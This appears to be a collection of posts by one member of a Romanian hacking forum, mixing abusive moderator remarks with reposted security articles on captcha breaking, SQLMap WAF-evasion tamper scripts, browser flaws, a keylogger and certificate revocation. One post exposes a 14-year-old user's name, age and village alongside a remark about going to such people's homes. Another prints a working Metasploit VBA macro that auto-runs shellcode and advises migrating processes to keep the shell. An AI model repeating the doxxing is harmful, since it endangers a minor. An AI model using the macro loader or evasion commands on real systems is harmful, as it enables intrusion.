Nytro

Cei cu crash-ul, ia sa vad, cum crashuiti voi Chrome? Scrieti o pagina HTML sau un cod Javascript care sa crashuiasca Chrome...

Si cica Parlamentul European vrea sa opreasca aceste "atacuri" pentru A PROTEJA DREPTURILE PROGRAMATORILOR, cand ei ofera o gramada de bani tocmai pentru a "incalca" acest drept. Muie parlamentarilor de peste tot. Sunt foarte mici sansele sa reuseasca cineva ceva. Doar cei de la VUPEN au reusit, unde sunt oameni cu adevarat "bazati", oameni care castiga rapid acei 60.000 de dolari si care poate nici nu s-ar obosi sa se deplaseze pentru aceasta suma.

Banul nu se scoate indiferent cati "prieteni" de pe messenger de-ai tai s-ar da cu curul de paman. Moderatorii nu o sa scoata banul pentru ca raman fara moderator. Iar tu ban, sunt interzise conturile multiple, si mi se lua de acest tam-tam. Daca se mai trezeste unul sa comenteze urmeaza pe lista de banati. Nu va convine va dati cu curul de pamant.

Nu stiu cine esti si de ce ai postat aici, nu iti dadeam ban, dar e RST nu RTS, asa ca "La revedere".

Muie Parlamentului European. Daca ma gandesc la Romania, ce astfel de parlamentari are, orice cuvinte sunt inutile... Astia sunt prosti de bubuie. Practic "programatorii" nu vor aceste legi tampite, NU e spre binele lor, e inca o tentativa de control in masa.

ID: mafteiliviu14, deci il cheama Mafei Liviu si are 14 ani (sunt un geniu, stiu) si e din Neamt, comuna Urecheni. De ce nu fac cacaturi ca acesta oameni din Bucuresti, sa putem merge peste ei acasa?

Thanks. O recomand tuturor care au o parere buna despre ei, e demonstratia perfecta pentru ceea ce inseamna hacking. PS: Daca vreti cartea (tiparita) dati si voi o bere si o imprumut.

Nu e nevoie sa posteze, vreau doar sa citeasca, si sa realizeze ca dupa 13 ani de la aparitia acestui fenomen, au inceput sa apara persoane auto-intitulate "hackeri" doar pentru ca presupun ca inteleg aceasta tehnica. O sa postez diseara niste articole interesante, sa inteleaga lumea ca la capitolul SQLI suntem cu vreo 8 ani in urma...

Descarcam si eu cand nu aveam ce face: Mirror: [URL]https://rstcenter.com/videos/Debugging/[/URL]

On Christmas day, 1998 Phrack 54 was issued. Phrack[1], is a “Hacker magazine written by the community, for the community”. It is an excellent source of technical security information and in this particular edition, 54, there was an article entitled “NT Web Technology Vulnerabilities” written by rfp – or rain forest puppy. Amongst other things this article described a number of attacks that employed SQL injection, though at no point is this term used in the article. rfp discusses IDC and ASP applications running on Microsoft’s Internet Information Server feeding into SQL Server 6.5. This article is the first real public outing of SQL injection – it just wasn’t called SQL injection at that time. That would come later. Next of note was a security advisory published by Allaire[2] on February the 4th 1999, a little over a month after rfp’s article. The security bulletin discusses the threat posed by “Multiple SQL Statements in Dynamic Queries”. Link: http://phrack.org/issues.html?issue=54&id=8#article Cititi, si nu uitati ca a fost scris in 1998...

[h=1]Intel Joins LibreOffice[/h] Thu, 2012-02-23 09:52 by Swapnil Bhartiya The month of February is a month to remember for the LibreOffuce project. They formally incorporated the foundation in Berlin, released 3.5 with major changes and now Intel is joining the foundation as a member. Intel will also make available the LibreOffice for Windows from SUSE in Intel AppUp center. Intel AppUp Center is an online repository designed for Intel processor-based devices. "I have been using LibreOffice from day one for presentations at conferences and for data analysis," said Dawn Foster, open source community lead, Intel. "Our engineers have worked with the LibreOffice codebase to optimise it for Intel hardware. Adding it to the AppUp? Center is an obvious extension, and will provide an exciting feature for all Ultrabook users." "We are thrilled to add Intel to our existing roster of supporters", said Florian Effenberger, volunteer and TDF board member, "TDF is first and foremost a vendor neutral project committed to excellence in the office suite space, but we greatly value the support and advice we gain from organisations such as SUSE, Red Hat, Google, the Free Software Foundation (FSF) and Software in the Public Interest (SPI)." LibreOffice has put open source office suite in direct competition with Microsoft's own offering. OpenOffice suffered stagnation and did not see any innovation or improvement for a long time. Sursa: Intel Joins LibreOffice | Muktware

E vorba de fusul orar. GMT vs GMT + 2. Nu e nimic complicat...

Se aproba https://rstcenter.com/forum/search.php?do=finduser&userid=51601&starteronly=1&contenttype=vBForum_Thread

Citesti codul sursa, intelegi ce face, il compilezi si il executi cu parametri corespunzatori.

Ban. Sa nu va mai prind cu astfel de rahaturi pe aici.

Update: A look at ASLR in Android Ice Cream Sandwich 4.0 How we broke the NuCaptcha video scheme and what we propose to fix it Mozilla Releases Firefox 10.0.2 for png Flaw Keylogger poses as Facebook and Microsoft, steals login credentials Direct Shellcode Execution via MS Office Macros with Metasploit Hunting & Exploiting Directory Traversal Ubuntu 12.04 LTS Gets HUD Interface Trend Micro Releases HijackThis Source Code to sourceforge.net Google Chrome update fixes high-severity vulnerabilities and patches Flash Player Hacking / Exploiting / Cheating in Online Games Many roads to IAT Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021) Exploiting CVE-2011-2140 another flash player vulnerability [unix/Solaris] Structura fizica/logica disk-uri (system level) RudraScript .. Run code in every language from inside Lua scripts. Cand am timp ma mai ocup si mai postez, doar ca nu prea am mai avut timp. Pagina: https://www.facebook.com/rstforum https://www.facebook.com/rstforum

[h=1]How we broke the NuCaptcha video scheme and what we propose to fix it[/h] Feb, 17 2012 | Security | Elie | No comments NuCaptcha is the first widely deployed video captcha scheme. Since Technology Review interviewed me about NuCaptcha in October 2010, I have been working on evaluating its security and usability. In this blog post, I will discuss how we are able to break the current version of NuCaptcha with >90% success and also discuss a possible approach to fix them. Our fix is based on a new design principle called tracking resistance . Intuitively tracking resistance means you had object that have the same properties than the real captcha so the algorithm don’t know which object in the video he should track. When successfully implemented, tracking resistance makes video captcha secure against vision/machine learning attacks and more secure than standard text-based captchas. I have been working on NuCaptcha security with many people over the last year and half, including Matthieu Martin, Shang Ping, Jonathan Aigrain, Mike Bailey and John Mitchell. [h=2]Responsible disclosure[/h] Before getting started, it is important to mention that this post is a responsible disclosure: I have been in contact with the CEO of NuCaptcha for a couple of months now and have shared with him the result of our research way ahead of time, so they had plenty of time to get ready for this post (you can read their answer here) I also want to emphasize that the goal of this post is not to demo another cool attack (even though the algorithm is pretty nifty). Rather, I want to start an open discussion on the viability of our tracking resistance principle and to allow everyone to contribute to making video captchas a viable alternative to more traditional captcha schemes. [h=2]Feedback Welcome[/h] While discussing ongoing research (that is, before a research paper is accepted or submitted) is unorthodox in the security community, the numerous interactions I’ve had with various companies over the last 3 years made me realize many people rely on research results to design captchas. In this context, it is our duty to provide them the best and most secure design guidelines possible. I strongly believe in the example set by the cryptography community, that the best security is achieved through an open process and not with secrecy or isolation. Accordingly, this post summarizes our understanding of video captcha security and the reasoning that leads us to believe that tracking resistance is the best principle to make video captcha secure. The most difficult part of this research turned out not to be breaking NuCaptcha, which I’ve known how to do since December 2010, but rather to come up with the right abstraction to explain why video captchas might offer better security that image captchas and to synthesize where the extra security comes from. With this in mind let’s get started on how to break NuCaptchas before discussing how to make them secure. [h=2]The NuCaptcha Scheme[/h] There are currently two different versions of NuCaptcha: a ‘simple’ version and the ‘standard’ version. The simple version looks like this: The standard version looks like this: As visible in the screenshot, the standard version differs from the simple version by a text animation from right to left. The user is then asked to enter the last word in the input box in the standard version. This scheme has multiple levels of security: In its easiest version the letters of the last word are in red, in the hard version the letters are in black and more heavily distorted. According to the site documentation, NuCaptcha uses a reputation algorithm to decide which version you get. Under the hood the NuCaptchas are short video files that contains about 500 frames. [h=2]Which version to evaluate?[/h] Since our technique successfully breaks the simple and the standard version of NuCaptcha, I am going to stick with the standard version because I believe that motion is the key feature to create a secure video captcha. To keep things fair, we are also going to focus on breaking the hard version and not rely on any of the advantages provided by having the letter in red or having them less distorted. [h=2]Background customization[/h] NuCaptcha allows users to choose between various background to customize their captchas. However, as we showed at CCS last year (available here) in our paper on breaking and securing text captchas, removing the background is fairly easy with the right algorithm so we are going to stick with the default one. Regardless of the background chosen, but our attack still applies. [h=2]Attack algorithm overview[/h] Overall, breaking a NuCaptcha captcha is done by accomplishing the 5 phases depicted in the diagram below. The attack algorithm assumes NuCaptchas that have been converted into frames. This step can be trivially executed using off-the-shelf software, so we will not discuss it here. The pre-processing phase involves removing the background and binarizing the captcha in black and white so it is easier to process. The frame analysis phase is then used to find the object in each frame can potentially be the captcha. The cross-frame analysis phase combines the frame analysis results to isolate the set of frames where the actual captcha is present. The segmentation phase aims at separating the captcha letters. As we will see there are a couple of ways to do this–having multiples distortions of the same captcha actually gives us an opportunity to be more efficient at segmentation than with a standard captcha. Finally, the recognition phase is used to recognize each letter individually using a machine learning algorithm. [h=4]How does it compare to standard text-based captchas[/h] Compared to breaking image-based captchas, attacking video captchas is both harder and easier. It is harder because motion tracking is necessary to isolate the frames that contains the actual captcha. It is easier because being able to analyze multiple copies of the same captcha can boost the accuracy of the segmentation phase. Since the pre-processing part and the recognition part are very well understood and use well-known techniques, I am going to skip them to keep this blog post shorter. If you are interested in the subject or need a refresher, please read my paper on attacking image-based captchas (available here). [h=2]Finding the captcha[/h] Before we can attempt to segment the captcha, we first need to find the frames in which it appears. We assume that each NuCaptcha has a different starting point in the animation, as we want our attack to be robust and not to rely on easily fixable features. Our first task is thus to isolate the frames that contain the captcha itself, and within these frames isolate the captcha from other words that appear. To achieve this we track and analyze the words moving in the captcha using image and motion tracking. Our captcha isolation technique works backward and is done in two steps: First we isolate the most interesting object in each frame (see next section), then we track theses objects across multiple frames and keep the set of 50 frames that contain the overall most interesting object. [h=2]Frame analysis: finding the most interesting object[/h] We relying two type of image analysis to isolate the most interesting object in each frame: a bounding box shape analysis, and an interest points (SIFT algorithm) density evaluation. An example of a frame where the object bounding boxes (the yellow squares), and object interests points (purple crosses) are computed is visible on the screenshot below: Based on these features, we found two ways to select the most interesting object: First, we look at the bounding box shape ratio width/height. Because the captcha is 4 letters long, we use a heuristic that the bounding box must have a width/height ratio of greater than 1. We then discard every bounding box that is above or below certain thresholds, as we roughly know what the expected ratio is after looking at a couple of captchas. Second, we look at the SIFT (Scale-invariant feature transform) interest points density by bounding box. As visible on the screenshot above, the captcha bounding box contains more interesting points that the other boxes. This is explained by the fact that the captcha letters are rotated independently and therefore have more ‘edges/corners’ than straight letters. The fact that the letters are rotated also implies that for the real captcha the interests points are scattered all over the box. On the other boxes the interest points are mostly nears the edges because the letters are straight. We aggregate theses two observations (more points, more scattering) into a density metric D that will be used to select the most interesting object. The metric D is computed as follows: D = Sum(1/distance(p_1, box_center)) where distance is the Euclidean distance and p_1 is each interest point. Basically, D calculates a weighted-sum of all the interest points by giving more weight to the interest points closer to the center of the box. Combining these two techniques allow us to isolate the most ‘interesting’ object in each frame, by removing the objects below or above the bounding box thresholds and picking up the object for which D is the highest. The result of this selection algorithm for our example fame is visible on the screenshot below (Den being the value of the metric D for the given box): [h=2]Cross-frames analysis: finding the captcha[/h] Being able to isolate interesting objects is not good enough because in some frames the captcha will not be present. To isolate the set of frames where the most interesting object is the real captcha, we use the features extracted during the frame analysis step to do a “cross-frame analysis.” Our cross-frame algorithm works by computing a sliding window over the density metric D on 50 frames. As visible on the screenshots below, where the D value of the window is represented in the red curve, there is a clear spike when the captcha is displayed. So all we have to do is keep the highest spike (which encompass 50 frames) and discard the remaining frames. [h=3]Segmenting the captcha[/h] The previous step identified 50 frame containing the captcha, giving us 50 instances of the same captchas that are slightly different (each letter is being animated independently). Here is an example: We can exploit these multiple variations of the same captcha in three different ways to help segment the captcha into individual letters. First we can try to find an instance where all the letters are disjoint, making the segmentation trivial with a clustering algorithm. While we did found some instances where this is the case, this is not a good approach as it is unreliable and can be patched very easily. The second approach is to try Decaptcha (our captcha tool) on every instance, and uses a voting decision to select the most probable answer. Using this approach, Decaptcha gives a 83% success rate on NuCaptchas. Here is an example of some of the clusters we have on a given NuCaptcha. It can be seen that than some of them are better segmented than others and therefore easier to recognize. It is likely possible to improve the effectiveness of this approach by factoring the confidence of the classifier in the voting procedure, but since the results with simple voting were already good enough to prove NuCaptcha vulnerable, we ended up not pursing this direction. A third approach to get close to 100% success rate is to use motion tracking (optical flow) to segment the letters. This approach uses a two-step algorithm. First, we compute the interest points in each frame and then track them across frames. You can see an example of this step on the screenshot below: Second, we compute a distance matrix (using a RANSAC algorithm) to analyze which interest points move together, defined as their relative distance staying almost constant. Each group of points that moves together makes up a cluster that represents a letter. We can use these points to know where each letter starts and ends and to perform segmentation, which we show in the screenshots below. Since matching corresponding interest points between frames is never perfect, sometime we have very good results and sometime bad ones. However, since we track letter movements between pair of frames (the frame and the frame + 5) we have a lot of candidates to choose from, and we only need one good match to be successful. This discrepancy between the quality of the matches is illustrated on the screenshot below: The left side depict an example where the tracking has generated 6 clusters that are not very accurate. The example on the right shows a successful clustering based on the distance matrix data. Even though the E, A, and, P are collapsed we are able to almost perfectly separate them using the distance matrix. [h=4]Synthesizing the problem[/h] To summarize, animating the captcha allows the attacker to do a “differential” analysis that helps the attack be more efficient. On the other hand, not animating the captcha is equivalent to having a static (text-based) captcha renders moot any security advantage of using a video captcha. [h=2]Toward secure video captcha[/h] So are video captchas worthless? No, but it requires a lot of out of the box thinking for us to find a way out. It took us significantly longer to understand the root of the problem and how to solve it than to break the current NuCaptcha scheme. Once we have accepted the fact that the segmentation resistance for video captchas will be equivalent or lower than a standard text-based captcha(as explained above), it becomes clear that the extra-security provided by using a video captcha needs to come from somewhere else–We have to find a hard vision problem to rely upon. Trying to prevent the computer from finding moving objects using a ‘confusing/moving background’ is a lost cause. The computer vision field has devised very efficient algorithms (optical flow algorithm) that are likely to destroy any attempts in this direction. On the other hand, it seems possible to make the isolation of the correct moving object very difficult. What we need to do is to remove every discriminative feature (or invariants as Jeff Yan calls them) that the attacker can use to tell apart decoy moving objects and the real captchas. For example our attack relies on two discriminative features to isolate the captchas: the number of interest points and the shape of the bounding box. Both of these features can be nullified by adding (moving) decoys that exhibit the same properties. [h=2]NuCaptcha Response[/h] As I said in the introduction, we notified NuCaptcha on November 21st, 2011 informing them we had an attack against their current scheme and iterated with them until December 15th 2011. On February 7th we wrote this blog post and shared it with them. At this time, they provided us an official answer that you can read here. Their answer contains two mains points regarding the attack. First on page one, they state, that they have a harder version that add more distortions and where the letters are more crowded. When scraping their API, we emulate the behavior of a real bot by aggressively timing our requests. While we believe we got the version that a standard attacker might get (which is already harder than the version displayed on site), we have not evaluated the hard version referenced in their response. With respect to the difficulty of their hard CAPCHA, I don’t believe that these heavier distortions are an efficient defense because even if the letters are more crowded, it should not impact an optical flow algorithm used to separate the letters. Further, I belive the heavier distortions should not be an issue for the recognition phase as it is well known since 2005 that computers beat human when it comes down to recognizing a single heavily distorted character. The solution proposed by NuCaptcha. Image taken from their response. Regarding their fix, they propose adding inter-frame manipulation (see screenshot above ) which should mess-up our optical flow analysis by throwing of our distance matrix. I won’t be able to characterize the effectiveness of this technique until they roll out their changes and I can test it. My guess is that it is somewhat less effective, based on the fact than in cryptography adding noise to prevent side-channel attacks has been known to be ineffective (The canonical example being the differential power analysis attack (DPA) by Paul Kocher), but again will withhold judgement until we can test. [h=2]Toward secure video captcha[/h] It is likely that there are features other than the two we used that can be abused by an attacker to break tracking resistance. This is why, following the good practices pioneered by the cryptography community, we decided to ask for your help to find them This post openly discusses what we already know about video captcha security. We hope this is the first step in an evaluation process dedicated to make the video captcha tracking resistance a viable option. I will also discuss this attack in my upcoming RSA talk about captchas in February, so if you are around, I would be happy to discuss it. Sursa: How we broke the NuCaptcha video scheme and what we propose to fix it @ From Information to Intelligence

[h=1]SQLMap Tamper Scripts[/h] Web Application Firewalls have become the new security solution for several businesses. Many companies often ignore the actual vulnerabilities and merely rely on the firewall for protection. Regrettably, most, if not all firewalls can be bypassed. In saying this, my post will demonstrate how to use some of SQLMap’s new features to bypass WAFs/IDSs. I have recently had the pleasure of working on a few tamper scripts for SQLMap, which can be found in the latest development version from the subversion repository. svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev The focus of the tamper scripts is to modify the request in a way that will evade the detection of the WAF (Web Application Firewall) rules. In some cases, you might need to combine a few tamper scripts together in order to fool the WAF. For a complete list of the tamper scripts, you can refer to https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/ The first scripts I’ll demonstrate are space2hash.py and space2morehash.py which work with MySQL (still haven’t gotten around to the MSSQL one). These scripts will convert all spaces to block comments with random text. The extended version of the script (space2morehash.py) will also add the comments in between certain function names and the parenthesis. To get started using the tamper scripts, you use the –tamper switch followed by the script name. In my example I’m using the following command: ./sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py” Figure 1: space2morehash.py tamper script in action via websec.ca Read this whole blog, tamper scripts win. Sursa: SQLMap Tamper Scripts Security Aegis

[h=1]Google under fire over secretly tracking users By John Blackstone [/h] (CBS News) Some members of Congress are calling for an investigation of Google, after word came out the company has been tracking iPhone users all over the Internet -- even users who thought they blocked that kind of surveillance CBS News correspondent John Blackstone spoke with the man who uncovered what Google was doing. Stanford University grad student Jonathan Meyer was doing research on Internet privacy, when he discovered the computer code that let Google bypass user privacy settings. "The list just goes on and on," said Meyer. "If you went to these sites and thought you were there privately, you weren't?" asked Blackstone. "That's right," he said. Google tracked iPhone users by cheating Safari Most iPhone and iPad users access the Internet through Apple's Safari browser, which automatically sets up a barrier to keep out tracking programs from third-party advertisers. Google found a way to secretly get through that barrier, letting the advertisers flow in and tracking information flow out. "The technology we were looking at involves taking what Google learned through organizing your information, and using that to enrich their advertising content on non-Google websites," said Meyer. Blackstone posed a question: "Google's slogan: 'Do no evil.' Is this evil? "I think it raises question about evil," said Meyer. "I hesitate to give a bright line response on the evil or not. I think if evil includes negligence and gross negligence, then this is evil." In a statement, Google insists the tracking codes it planted "do not collect personal information." And that it "didn't anticipate this would happen" when it made changes to improve access to Google features on Safari. Tracking user on-line habits is the most valuable information Internet companies and advertisers can get. John Simpson, a consumer advocate, said user preferences and information are what Google is selling. "Don't think of yourself as Google's customer, you are Google's product," he said. Blackstone asked Meyer when he goes online, does he turn the privacy settings up full? "For sure," Meyer replied. "I think it's pretty absurd. You shouldn't need a Ph.D. in computer science to protect yourself." Meyer said his research at Stanford University shows that what we used to call spyware is now become standard business practice on the Internet. Also, Google said it has removed the code that created that privacy loophole. Sursa: Google under fire over secretly tracking users - CBS News

[h=1]Mozilla Releases Firefox 10.0.2 for png Flaw[/h]By Sean Michael Kerner | February 17, 2012 From the 'Be Careful What you Click' files: At the end of last week, Mozilla released Firefox 10.0.1, which fixed a single flaw. Now here we are at the end of a new week, and there is another release with Firefox 10.0.2. This time the flaw is one that I'm familiar with - as it was patched by Google in Chrome 17, just slightly ahead of the Firefox 10.0.2 update. The actual flaw is a vulnerability in the libpng graphics library that many open source tools (including browsers) use. It's an integer overflow flaw that could have some serious consequences. "An attacker could craft malicious images which exploit this bug, and deliver them to users through websites or email messages," Mozilla warned in its advisory. According to Mozilla, they were alerted about the flaw by Red Hat. In any event, make sure you update, this is a flaw looks relatively easy to me to exploit and thanks to the quick actions of Google and Mozilla - now trivially easy to protect against too. Sursa: Mozilla Releases Firefox 10.0.2 for png Flaw - InternetNews.

[h=2]Keylogger poses as Facebook and Microsoft, steals login credentials[/h]y Dave Michmerhuizen & Luis Chapetti – Security Researchers Most computer users have a haunting fear that somehow malware will find a way to sneak onto their PCs when they are not looking. The truth is that while this does sometimes happen, the most common types of malware rely on trickery to invade and infect your computer. An excellent example of this fell into our spam traps recently, a spam that pretended to be from Facebook (an easy thing to fake, actually) hiding its payload behind an official looking graphic from Microsoft. In this case the image is an HTML link supposedly offering up Microsoft Silverlight. If you take your time and examine the destination of that link you’ll see that the real payload is a .PIF file from an IP address in Malaysia. PIF files are Windows executable files, and in this case the executable that is actually sent is Trojan.Win32.Jorik. It can’t sneak onto your computer and install itself though; it needs your help to do that. Clicking on the Silverlight graphic does warn you that you’re about to run a program. This is why the Microsoft graphic is a clever addition to the ruse – you think you should be running a Microsoft program, and it’s doing exactly what you expect. The problem, of course, comes once you’ve pressed ‘Run’ and find out there is no Facebook or Silverlight, there is only malware. Trojan.Win32.Jorik is actually a keylogger. It begins monitoring your Web browsing, writing every keystroke and Web page title into a disk file. The keylogger can capture almost anything you do on the Web. This is of particular concern when visiting secure sites whose credentials you definitely want kept private, as demonstrated below: [TABLE=align: center] [TR] [TD] Wells Fargo HTTPS login page (click for larger image) [/TD] [/TR] [TR] [TD] Facebook login page (click for larger image) [/TD] [/TR] [TR] [TD] Gmail HTTPS login page (click for larger image) [/TD] [/TR] [/TABLE] We entered FakeUsername and FakePassword on all three sites. The results were easily found in the disk file that the keylogger maintains. Keylogger file contents (click for larger image) Ultimately this disk file is sent back to a command and control server, hidden by no-ip.com and most likely also in Malaysia. Network traffic to Command & Control (click for larger image) The bottom line, as we always say at Barracuda Labs, is to maintain a healthy skepticism about anything that appears in email. The easiest way into your computer is to persuade you to push that ‘run’ button. Spammers and malware distributors are constantly looking for ways to convince you to do just that. Be vigilant, don’t be a victim. Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails. Barracuda Web Filters and the Barracuda Web Security Flex service stop the download of this threat. Sursa: Keylogger poses as Facebook and Microsoft, steals login credentials | The Barracuda Labs Internet Security Blog

[h=1]The Differences Between Security Certifications[/h]Friday, February 17, 2012 Contributed By: Joshua Lochner I was involved recently in a conversation regarding, “What are worthwhile security-related certifications?” It seems like certifications have always been a source of contention for IT professionals. What are “The Right” certifications to get? Are they needed? Which ones would someone reap the most benefit from? Who cares? The right certifications to pursue are going to vary from person to person, as to what would suit your interests and meet your goals best. Ask yourself some basic questions: What interests me? For example… Are you a network administrator who wants to build up their credibility when proposing solutions to clients?... Or are you a database administrator or UNIX or Windows system administrator who wants to expand their knowledge in their existing job role? Do I want to remain in the same field or pursue a new path? What are your strong suits, and do you intend to build on those, or branch out in a new direction? Did you just change departments and want to establish a better understanding of the field you have moved into; if so, what certifications do your colleagues or would those above you respect? What would lead to career growth? Would there be a certification that would provide benefit to your organization? Have you asked around to determine if any certifications are needed to fill roles in the organization; and if you get the certifications, would that role be something you might be interested in? Sometimes a simple certification can help to meet a business objective, or grow an internal process; and by helping the organization meet its objectives, the position filled may be higher up on the ladder than where you currently are. Let’s run through a couple of questions on the Certs Diagram, and you’ll be on your way to figuring out whether a CCIE Security, a CIAC GCIH, or a GIAC GPEN would be the best cert for you to pursue next. (click image to enlarge) Bear in mind, the Certs Diagram is non-exhaustive; it is more to illustrate the point that there are lots of avenues to go down when approaching security certifications. That is why my company employs experts in five different practices to make a cohesive team. The benefits of pursuing information security certifications that align with one’s personal goals are reflected here. Cross-posted from SecureState Sursa: The Differences Between Security Certifications

[h=1]Symantec: Stripping online certificate revocation checks from Chrome is misguided[/h][h=2]Symantec says that Google and other browser vendors should help fix OCSP instead of giving up on it[/h] By Lucian Constantin | IDG News Service Stripping OCSP (Online Certificate Status Protocol) and CRL (certificate revocation list) checks from Google Chrome could have dangerous implications because it will turn Google into a single point of failure, according to security vendor Symantec. When accessing a website over HTTPS (HTTP Secure), browsers check whether its SSL certificate has been revoked by the issuing certificate authority (CA). This is done by querying the CA's OCSP responder or by checking its published certificate revocation list. [ Prevent corporate data leaks with Roger Grimes' "Data Loss Prevention Deep Dive" PDF expert guide, only from InfoWorld. | Stay up to date on the latest security developments with InfoWorld's Security Central newsletter. ] For usability reasons, all major browsers currently ignore OCSP and CRL requests that result in network errors by default, in what is known as a soft-fail mechanism. However, some of them do offer users the option to enable hard-fail, which triggers errors for every request that goes unanswered. On Feb. 5, Adam Langley, a security engineer at Google, announced that Chrome will stop performing OCSP and CRL checks in future versions. Instead, these checks are to be replaced with a locally cached list of revoked certificates that will be kept up to date by Google. The reasons behind the decision are related to performance and security issues. OCSP and CRL requests increase page load times and are susceptible to blocking by man-in-the-middle attackers or captive portals, websites commonly used by Wi-Fi access points to prevent HTTP connections before users authenticate. "This is a corner case that happens very infrequently. We argue that one shouldn't discard OCSP and CRLs because they don't work in a tiny fraction of cases," said Fran Rosch, vice president of Trust Services and SSL at Symantec, in a blog post on Thursday. "His [Langley's] proposal to have the browser maintain a list of revoked certificates turns Google into a single point of failure, which Langley himself agrees is bad engineering practice," Rosch said. According to Rosch, the soft-fail mechanism currently used by browsers is the real issue, since it allows HTTPS sessions to continue without establishing whether the SSL certificate is valid or not. Symantec has maintained an uptime of 100 percent for its OCSP and CRL services for the past ten years, so CA-level downtime shouldn't be a concern, he said. "OCSP clearly does not work today because all major browsers operate it in soft-fail mode. That needs fixing," said Ivan Ristic, director of engineering at security firm Qualys, via email. "My view is that Google should have first made an effort to fix the problem," he said. Qualys plans to start a project called "Global OCSP Responder monitoring" which will track the availability of all OCSP responders and identify CAs with unreliable ones. "That would hopefully enable everyone to switch to hard-fail by default," Ristic said. According to Ristic, the performance issues could be resolved with the help of a technique known as OCSP stapling, which involves the owner of a SSL certificate querying the CA's OCSP server periodically and caching a signed response. This response would then be served to clients directly without them needing to open a connection to a separate host. "Even without OCSP stapling, browsers can start to display a web site and perform the check in the background, so there's not going to be an immediate performance impact," Ristic said. "They could hard-fail after a second or two, possibly preventing further interactions with the site." Removing OCSP checks from Google Chrome might even have legal implications for users, who won't be able to claim warranties for damages resulting from the use of bad certificates if the software they rely on doesn't make an effort to check certificate revocation status, said Eddy Nigg, founder and chief technology officer of certificate authority StartCom, via email. "Strictly speaking, Google as a relying party and software vendor might not be able to make use of the CA root certificates its browser currently uses, due to non-compliance to those relying party obligations," Nigg said. Nigg agreed that the problem is the soft-fail mechanism implemented in browsers, which he described as a failure in itself. "It's rather the browsers that have fairly weak implementations at their side and don't try hard enough (and smart enough) in order to obtain a status response," he said. Sursa: Symantec: Stripping online certificate revocation checks from Chrome is misguided | Security - InfoWorld

[h=3]Direct Shellcode Execution via MS Office Macros with Metasploit[/h][h=2]Friday, February 3, 2012[/h] scriptjunkie recently had a post on Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there. How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around. msf > use payload/windows/exec msf payload(exec) > set CMD calc CMD => calc msf payload(exec) > set EXITFUNC thread EXITFUNC => thread msf payload(exec) > generate -t vba #If Vba7 Then Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr #Else Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long #EndIf Sub Auto_Open() Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long #If Vba7 Then Dim Xlbufvetp As LongPtr #Else Dim Xlbufvetp As Long #EndIf Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _ 139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _ 13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _ 116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _ 214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _ 36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _ 139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _ 235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _ 224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _ 187,71,19,114,111,106,0,83,255,213,99,97,108,99,0) Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40) For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp) Wyzayxya = Hyeyhafxp(Zolde) Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1) Next Zolde Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application. Posted by CG at 5:21 PM Sursa: Carnal0wnage & Attack Research Blog: Direct Shellcode Execution via MS Office Macros with Metasploit

